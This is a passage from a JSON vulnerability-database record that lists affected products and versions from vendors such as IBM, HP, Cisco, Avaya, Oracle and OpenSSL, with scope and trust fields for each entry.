"system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.040" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.5" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "network node manager ispi performance for traffic", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "initiate master data service patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.029" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.5" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network node manager ispi for mpls vpn", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "chassis management module 2pete6l", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.11" }, { "model": "integrated management module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.00" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.12" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1010.3.1.1154" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "mobile wireless transport manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "java", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.85" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "infosphere master data management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "chassis management module 2peo12p", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.16" }, { "model": "powervu d9190 conditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jboss enterprise application platform", "scope": "ne", "trust": 0.3, "vendor": "redhat", "version": "6.4" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.05" }, { "model": "bes12 client", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.0.0.74" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.023" }, { "model": "jre update6", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.41" }, { "model": "lotus widget factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x353071600" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "jdk 0 09", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "network node manager ispi for ip telephony", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "aura conferencing sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.470" }, { "model": "java sdk sr16-fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.13" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.022" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.7" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.2" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.021" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.5" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.29" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "bbm meetings for mac", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "java sdk 6r1 sr8-fp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "websphere real time sr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.36" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network node manager ispi for ip telephony", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "jdk update5", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "websphere real time sr8 fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.4" }, { "model": "rational agent controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.06" }, { "model": "flashsystem 9846-ac2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v90007.5.1.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.07" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.11" }, { "model": "virtual connect enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "network node manager ispi for net", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.3" }, { "model": "sterling connect:direct browser ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.213" }, { "model": "jdk update25", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.12" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.2.3" }, { "model": "phaser 3300mfp", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "20.105.52.000" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.6" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079140" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "os image for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.4" }, { "model": "flashsystem 9848-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.5" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.160" }, { "model": "jre update28", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.280" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.2" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.51" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "blend for android", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571910" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.017" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.32" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "004.000(1233)" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.10" }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "network node manager ispi for net", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "chassis management module 2pet10i", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "jre update33", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "bes12 client", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.0.0.69" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "link for mac os (build", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.1.135)" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571450" }, { "model": "network node manager i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "java sdk sr11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1" }, { "model": "java sdk sr15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "aura conferencing sp6", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.0.121" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "jdk update18", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "mashup center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.8" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "domino fix pack if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.367" }, { "model": "jre update1", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.3" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.20" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "aura messaging sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.0.1" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.1.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.031" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "db2 connect unlimited advanced edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.030" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.4" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.019" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jre 1.6.0 37", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "bbm on android", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "2.7.0.6" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "netezza platform software 7.0.4.7-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "network node manager ispi performance for traffic", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.19" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "network node manager ispi for mpls vpn", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "link for windows", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.2.3.48" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "flashsystem 9848-ae2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v90007.5.1.0" }, { "model": "communications session border controller scz7.4.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.410" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "32603.50.01.11" }, { "model": "bbm protected on blackberry os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "db2 connect enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.0p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "36000" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70104.1" }, { "model": "cms r16.3 r6", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "rational automation framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.1" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "app for netapp data ontap", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.13" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "infosphere master data management server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 